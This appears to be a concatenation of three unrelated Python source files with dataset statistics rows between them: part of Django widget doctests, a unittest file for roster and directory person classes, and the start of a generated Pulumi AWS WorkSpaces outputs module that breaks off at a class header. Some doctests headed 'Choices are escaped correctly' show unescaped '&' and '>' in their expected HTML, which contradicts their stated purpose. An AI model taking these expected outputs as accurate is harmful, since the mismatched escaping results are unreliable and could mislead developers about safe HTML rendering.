<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
The value is compared to its str():
>>> print w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
>>> print w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
>>> print w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
The 'choices' argument can be any iterable:
>>> def get_choices():
...     for i in range(5):
...         yield (i, i)
>>> print w.render('num', 2, choices=get_choices())
<ul>
<li><label><input type="radio" name="num" value="0" /> 0</label></li>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
</ul>
You can also pass 'choices' to the constructor:
>>> w = RadioSelect(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('num', 2)
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('num', 2, choices=[(4, 4), (5, 5)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
<li><label><input type="radio" name="num" value="5" /> 5</label></li>
</ul>
RadioSelect uses a RadioFieldRenderer to render the individual radio inputs.
You can manipulate that object directly to customize the way the RadioSelect
is rendered.
>>> w = RadioSelect()
>>> r = w.get_renderer('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
>>> for inp in r:
...     print inp
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
<label><input type="radio" name="beatle" value="P" /> Paul</label>
<label><input type="radio" name="beatle" value="G" /> George</label>
<label><input type="radio" name="beatle" value="R" /> Ringo</label>
>>> for inp in r:
...     print '%s<br />' % inp
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label><br />
>>> for inp in r:
...     print '<p>%s %s</p>' % (inp.tag(), inp.choice_label)
<p><input checked="checked" type="radio" name="beatle" value="J" /> John</p>
<p><input type="radio" name="beatle" value="P" /> Paul</p>
<p><input type="radio" name="beatle" value="G" /> George</p>
<p><input type="radio" name="beatle" value="R" /> Ringo</p>
>>> for inp in r:
...     print '%s %s %s %s %s' % (inp.name, inp.value, inp.choice_value, inp.choice_label, inp.is_checked())
beatle J J John True
beatle J P Paul False
beatle J G George False
beatle J R Ringo False
You can create your own custom renderers for RadioSelect to use.
>>> class MyRenderer(RadioFieldRenderer):
...     def render(self):
...         return u'<br />\n'.join([unicode(choice) for choice in self])
>>> w = RadioSelect(renderer=MyRenderer)
>>> print w.render('beatle', 'G', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<label><input type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input checked="checked" type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label>
Or you can use custom RadioSelect fields that use your custom renderer.
>>> class CustomRadioSelect(RadioSelect):
...     renderer = MyRenderer
>>> w = CustomRadioSelect()
>>> print w.render('beatle', 'G', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<label><input type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input checked="checked" type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label>
A RadioFieldRenderer object also allows index access to individual RadioInput
objects.
>>> w = RadioSelect()
>>> r = w.get_renderer('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
>>> print r[1]
<label><input type="radio" name="beatle" value="P" /> Paul</label>
>>> print r[0]
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
>>> r[0].is_checked()
True
>>> r[1].is_checked()
False
>>> r[1].name, r[1].value, r[1].choice_value, r[1].choice_label
('beatle', u'J', u'P', u'Paul')
>>> r[10] # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
IndexError: list index out of range
# Choices are escaped correctly
>>> w = RadioSelect()
>>> print w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me'))))
<ul>
<li><label><input type="radio" name="escape" value="bad" /> you & me</label></li>
<li><label><input type="radio" name="escape" value="good" /> you > me</label></li>
</ul>
# Unicode choices are correctly rendered as HTML
>>> w = RadioSelect()
>>> unicode(w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]))
u'<ul>\n<li><label><input checked="checked" type="radio" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="radio" name="email" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>'
# Attributes provided at instantiation are passed to the constituent inputs
>>> w = RadioSelect(attrs={'id':'foo'})
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label for="foo_0"><input checked="checked" type="radio" id="foo_0" value="J" name="beatle" /> John</label></li>
<li><label for="foo_1"><input type="radio" id="foo_1" value="P" name="beatle" /> Paul</label></li>
<li><label for="foo_2"><input type="radio" id="foo_2" value="G" name="beatle" /> George</label></li>
<li><label for="foo_3"><input type="radio" id="foo_3" value="R" name="beatle" /> Ringo</label></li>
</ul>
# Attributes provided at render-time are passed to the constituent inputs
>>> w = RadioSelect()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')), attrs={'id':'bar'})
<ul>
<li><label for="bar_0"><input checked="checked" type="radio" id="bar_0" value="J" name="beatle" /> John</label></li>
<li><label for="bar_1"><input type="radio" id="bar_1" value="P" name="beatle" /> Paul</label></li>
<li><label for="bar_2"><input type="radio" id="bar_2" value="G" name="beatle" /> George</label></li>
<li><label for="bar_3"><input type="radio" id="bar_3" value="R" name="beatle" /> Ringo</label></li>
</ul>
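Because the constituent inputs get '_0', '_1', ... id suffixes, the widget points a
label at the first input; a minimal sketch of id_for_label:
>>> w.id_for_label('id_beatle')
'id_beatle_0'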
# CheckboxSelectMultiple Widget ###############################################
>>> w = CheckboxSelectMultiple()
>>> print w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
>>> print w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
>>> print w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If the value is None, none of the options are selected:
>>> print w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If multiple values are given, but some of them are not valid, the valid ones are selected:
>>> print w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
The value is compared to its str():
>>> print w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
>>> print w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
>>> print w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
The 'choices' argument can be any iterable:
>>> def get_choices():
...     for i in range(5):
...         yield (i, i)
>>> print w.render('nums', [2], choices=get_choices())
<ul>
<li><label><input type="checkbox" name="nums" value="0" /> 0</label></li>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
</ul>
You can also pass 'choices' to the constructor:
>>> w = CheckboxSelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('nums', [2])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('nums', [2], choices=[(4, 4), (5, 5)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
<li><label><input type="checkbox" name="nums" value="5" /> 5</label></li>
</ul>
# Choices are escaped correctly
>>> print w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me'))))
<ul>
<li><label><input type="checkbox" name="escape" value="1" /> 1</label></li>
<li><label><input type="checkbox" name="escape" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="escape" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="escape" value="bad" /> you & me</label></li>
<li><label><input type="checkbox" name="escape" value="good" /> you > me</label></li>
</ul>
# Test the usage of _has_changed
>>> w._has_changed(None, None)
False
>>> w._has_changed([], None)
False
>>> w._has_changed(None, [u'1'])
True
>>> w._has_changed([1, 2], [u'1', u'2'])
False
>>> w._has_changed([1, 2], [u'1'])
True
>>> w._has_changed([1, 2], [u'1', u'3'])
True
# Unicode choices are correctly rendered as HTML
>>> w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<ul>\n<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>\n<li><label><input type="checkbox" name="nums" value="2" /> 2</label></li>\n<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>\n<li><label><input checked="checked" type="checkbox" name="nums" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="checkbox" name="nums" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>'
# MultiWidget #################################################################
>>> class MyMultiWidget(MultiWidget):
...     def decompress(self, value):
...         if value:
...             return value.split('__')
...         return ['', '']
...     def format_output(self, rendered_widgets):
...         return u'<br />'.join(rendered_widgets)
>>> w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})))
>>> w.render('name', ['john', 'lennon'])
u'<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />'
>>> w.render('name', 'john__lennon')
u'<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />'
>>> w.render('name', 'john__lennon', attrs={'id':'foo'})
u'<input id="foo_0" type="text" class="big" value="john" name="name_0" /><br /><input id="foo_1" type="text" class="small" value="lennon" name="name_1" />'
>>> w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})), attrs={'id': 'bar'})
>>> w.render('name', ['john', 'lennon'])
u'<input id="bar_0" type="text" class="big" value="john" name="name_0" /><br /><input id="bar_1" type="text" class="small" value="lennon" name="name_1" />'
>>> w = MyMultiWidget(widgets=(TextInput(), TextInput()))
# test with no initial data
>>> w._has_changed(None, [u'john', u'lennon'])
True
# test when the data is the same as initial
>>> w._has_changed(u'john__lennon', [u'john', u'lennon'])
False
# test when the first widget's data has changed
>>> w._has_changed(u'john__lennon', [u'alfred', u'lennon'])
True
# test when the last widget's data has changed. this ensures that it is not
# short circuiting while testing the widgets.
>>> w._has_changed(u'john__lennon', [u'john', u'denver'])
True
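Each sub-widget reads its own value back out of the data dict using the same
'_0'/'_1' suffix convention; a minimal sketch of value_from_datadict with the widget above:
>>> w.value_from_datadict({'name_0': u'john', 'name_1': u'lennon'}, {}, 'name')
[u'john', u'lennon']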
# SplitDateTimeWidget #########################################################
>>> w = SplitDateTimeWidget()
>>> w.render('date', '')
u'<input type="text" name="date_0" /><input type="text" name="date_1" />'
>>> w.render('date', None)
u'<input type="text" name="date_0" /><input type="text" name="date_1" />'
>>> w.render('date', datetime.datetime(2006, 1, 10, 7, 30))
u'<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />'
>>> w.render('date', [datetime.date(2006, 1, 10), datetime.time(7, 30)])
u'<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />'
You can also pass 'attrs' to the constructor. In this case, the attrs will be
included on both widgets.
>>> w = SplitDateTimeWidget(attrs={'class': 'pretty'})
>>> w.render('date', datetime.datetime(2006, 1, 10, 7, 30))
u'<input type="text" class="pretty" value="2006-01-10" name="date_0" /><input type="text" class="pretty" value="07:30:00" name="date_1" />'
>>> w._has_changed(datetime.datetime(2008, 5, 5, 12, 40, 00), [u'2008-05-05', u'12:40:00'])
False
>>> w._has_changed(datetime.datetime(2008, 5, 5, 12, 40, 00), [u'2008-05-05', u'12:41:00'])
True
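The single datetime value is split into the date and time pieces rendered by the two
sub-inputs; a minimal sketch of decompress:
>>> w.decompress(datetime.datetime(2006, 1, 10, 7, 30))
[datetime.date(2006, 1, 10), datetime.time(7, 30)]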
# DateTimeInput ###############################################################
>>> w = DateTimeInput()
>>> w.render('date', None)
u'<input type="text" name="date" />'
>>> d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
>>> print d
2007-09-17 12:51:34.482548
The microseconds are trimmed on display, by default.
>>> w.render('date', d)
u'<input type="text" name="date" value="2007-09-17 12:51:34" />'
>>> w.render('date', datetime.datetime(2007, 9, 17, 12, 51, 34))
u'<input type="text" name="date" value="2007-09-17 12:51:34" />'
>>> w.render('date', datetime.datetime(2007, 9, 17, 12, 51))
u'<input type="text" name="date" value="2007-09-17 12:51:00" />'
"""
| 44.826764
| 553
| 0.632642
| 7,218
| 48,906
| 4.259075
| 0.057911
| 0.051818
| 0.036692
| 0.036953
| 0.84731
| 0.825971
| 0.809804
| 0.791588
| 0.769501
| 0.735931
| 0
| 0.03035
| 0.103955
| 48,906
| 1,090
| 554
| 44.86789
| 0.67117
| 0.000429
| 0
| 0.557018
| 0
| 0.138158
| 0.998935
| 0.20251
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.087719
| 0.02193
| 0
| 0.02193
| 0.04386
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
40eaa44a8b131c34576218ca79e8c157527e0c5d
| 16,752
|
py
|
Python
|
TEST/person_test.py
|
djfkahn/MemberHubDirectoryTools
|
a103ef33f6e0907e57ac8d9e565ed8fef47554da
|
[
"Apache-2.0"
] | 2
|
2015-05-28T20:27:38.000Z
|
2019-10-17T00:42:54.000Z
|
TEST/person_test.py
|
djfkahn/MemberHubDirectoryTools
|
a103ef33f6e0907e57ac8d9e565ed8fef47554da
|
[
"Apache-2.0"
] | 96
|
2015-04-17T16:20:49.000Z
|
2022-01-15T00:41:26.000Z
|
TEST/person_test.py
|
djfkahn/MemberHubDirectoryTools
|
a103ef33f6e0907e57ac8d9e565ed8fef47554da
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import os
import hub_map_tools
import person
data_file_path = os.path.abspath("./roster_tools_tests/")
hub_file_name = data_file_path + "/hub_map.csv"
common_hub_map = hub_map_tools.ReadHubMapFromFile(hub_file_name)
class UT_RosterConstructor(unittest.TestCase):
def test_01_valid_adult(self):
result = person.RosterPerson(last_name ='A',
first_name ='B',
family_relation ='Adult',
teacher ='',
hub_map = common_hub_map)
self.assertEqual('A' , result.last_name)
self.assertEqual('B' , result.first_name)
self.assertEqual('Adult', result.family_relation)
self.assertEqual([] , result.hubs)
def test_02_valid_child(self):
result = person.RosterPerson(last_name='A',
first_name='B',
family_relation='Child',
teacher ='',
hub_map=common_hub_map)
self.assertEqual('A' , result.last_name)
self.assertEqual('B' , result.first_name)
self.assertEqual('Child', result.family_relation)
self.assertEqual([] , result.hubs)
def test_03_invalid_adult(self):
result = person.RosterPerson(last_name=None,
first_name='B',
family_relation='Child',
teacher ='',
hub_map=common_hub_map)
self.assertEqual(None, result.last_name)
self.assertEqual(None, result.first_name)
self.assertEqual(None, result.family_relation)
self.assertEqual([] , result.hubs)
def test_04_invalid_child(self):
result = person.RosterPerson(last_name='A',
first_name=None,
family_relation ='Child',
teacher ='',
hub_map=common_hub_map)
self.assertEqual(None, result.last_name)
self.assertEqual(None, result.first_name)
self.assertEqual(None, result.family_relation)
self.assertEqual([] , result.hubs)
def test_05_unknown_relation(self):
result = person.RosterPerson(last_name='A',
first_name='B',
family_relation =None,
teacher ='',
hub_map=common_hub_map)
self.assertEqual(None, result.last_name)
self.assertEqual(None, result.first_name)
self.assertEqual(None, result.family_relation)
self.assertEqual([] , result.hubs)
class UT_IsSame(unittest.TestCase):
def test_01_same_person(self):
person_A = person.RosterPerson(last_name='A',
first_name='B',
family_relation ='Adult',
teacher ='',
hub_map=common_hub_map)
self.assertTrue(person_A.IsSame(person_A))
def test_02_different_first_name(self):
person_A = person.RosterPerson(last_name ='Z',
first_name ='A',
family_relation ='Adult',
teacher ='',
hub_map =common_hub_map)
person_B = person.RosterPerson(last_name ='Z',
first_name ='B',
family_relation ='Adult',
teacher ='',
hub_map =common_hub_map)
self.assertFalse(person_A.IsSame(person_B))
def test_03_different_last_name(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Adult',
teacher ='',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Y',
first_name='A',
family_relation='Adult',
teacher ='',
hub_map=common_hub_map)
self.assertFalse(person_A.IsSame(person_B))
def test_04_different_relation(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Adult',
teacher ='',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Child',
teacher ='',
hub_map=common_hub_map)
self.assertFalse(person_A.IsSame(person_B))
@unittest.expectedFailure
def test_05_different_hub(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation ='Adult',
teacher ='First, John',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Adult',
teacher ='Second, Jane',
hub_map=common_hub_map)
self.assertFalse(person_A.IsSame(person_B))
@unittest.expectedFailure
def test_06_same_and_more_hub_adult(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Adult',
teacher ='First, John',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Z',
first_name='A',
family_relation ='Adult',
teacher ='First, John',
hub_map=common_hub_map)
person_B.hubs.append('2222')
self.assertFalse(person_A.IsSame(person_B))
@unittest.expectedFailure
def test_07_same_and_more_hub_child(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Child',
teacher ='First, John',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Child',
teacher ='First, John',
hub_map=common_hub_map)
person_B.hubs.append('2222')
self.assertFalse(person_A.IsSame(person_B))
class UT_DirectoryConstructor(unittest.TestCase):
def test_01_set_adult(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Adult',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertEqual('A', result.first_name)
self.assertEqual('C', result.last_name)
self.assertEqual('1234', result.person_id)
self.assertEqual('5678', result.family_id)
self.assertEqual('Adult',result.family_relation)
self.assertEqual('email',result.email)
self.assertEqual(['0000'],result.hubs)
def test_02_set_child(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertEqual('A', result.first_name)
self.assertEqual('C', result.last_name)
self.assertEqual('1234', result.person_id)
self.assertEqual('5678', result.family_id)
self.assertEqual('Child',result.family_relation)
self.assertEqual('email',result.email)
self.assertEqual(['0000'],result.hubs)
def test_03_set_no_first_name(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = '',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertIsNone(result.last_name)
self.assertIsNone(result.first_name)
self.assertIsNone(result.family_relation)
self.assertEqual([], result.hubs)
def test_04_set_no_last_name(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = '',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertIsNone(result.last_name)
self.assertIsNone(result.first_name)
self.assertIsNone(result.family_relation)
self.assertEqual([], result.hubs)
def test_05_set_no_relation(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = '',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertIsNone(result.last_name)
self.assertIsNone(result.first_name)
self.assertIsNone(result.family_relation)
self.assertEqual([], result.hubs)
def test_06_set_other_relation(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Other',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertIsNone(result.last_name)
self.assertIsNone(result.first_name)
self.assertIsNone(result.family_relation)
self.assertEqual([], result.hubs)
def test_07_set_no_hubs(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = ''.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertEqual('A', result.first_name)
self.assertEqual('C', result.last_name)
self.assertEqual('1234', result.person_id)
self.assertEqual('5678', result.family_id)
self.assertEqual('Child',result.family_relation)
self.assertEqual('email',result.email)
self.assertEqual([],result.hubs)
def test_02_set_multiple_hubs(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = 'Kinder (Room 0);First (Room 1)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertEqual('A', result.first_name)
self.assertEqual('C', result.last_name)
self.assertEqual('1234', result.person_id)
self.assertEqual('5678', result.family_id)
self.assertEqual('Child',result.family_relation)
self.assertEqual('email',result.email)
self.assertEqual(['0000','1111'],result.hubs)
if __name__ == '__main__':
unittest.main()
| 52.845426
| 102
| 0.403534
| 1,263
| 16,752
| 5.041964
| 0.071259
| 0.052764
| 0.050879
| 0.061244
| 0.910019
| 0.897613
| 0.896357
| 0.884108
| 0.881753
| 0.865421
| 0
| 0.020593
| 0.513013
| 16,752
| 317
| 103
| 52.845426
| 0.75999
| 0
| 0
| 0.843537
| 0
| 0
| 0.037366
| 0.001254
| 0
| 0
| 0
| 0
| 0.241497
| 1
| 0.068027
| false
| 0
| 0.013605
| 0
| 0.091837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9052ba263f84153268f03213c0429078fd588b4b
| 35,321
|
py
|
Python
|
sdk/python/pulumi_aws/workspaces/outputs.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 260
|
2018-06-18T14:57:00.000Z
|
2022-03-29T11:41:03.000Z
|
sdk/python/pulumi_aws/workspaces/outputs.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 1,154
|
2018-06-19T20:38:20.000Z
|
2022-03-31T19:48:16.000Z
|
sdk/python/pulumi_aws/workspaces/outputs.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 115
|
2018-06-28T03:20:27.000Z
|
2022-03-29T11:41:06.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'DirectorySelfServicePermissions',
'DirectoryWorkspaceAccessProperties',
'DirectoryWorkspaceCreationProperties',
'IpGroupRule',
'WorkspaceWorkspaceProperties',
'GetBundleComputeTypeResult',
'GetBundleRootStorageResult',
'GetBundleUserStorageResult',
'GetDirectorySelfServicePermissionResult',
'GetDirectoryWorkspaceAccessPropertyResult',
'GetDirectoryWorkspaceCreationPropertyResult',
'GetWorkspaceWorkspacePropertyResult',
]
@pulumi.output_type
class DirectorySelfServicePermissions(dict):
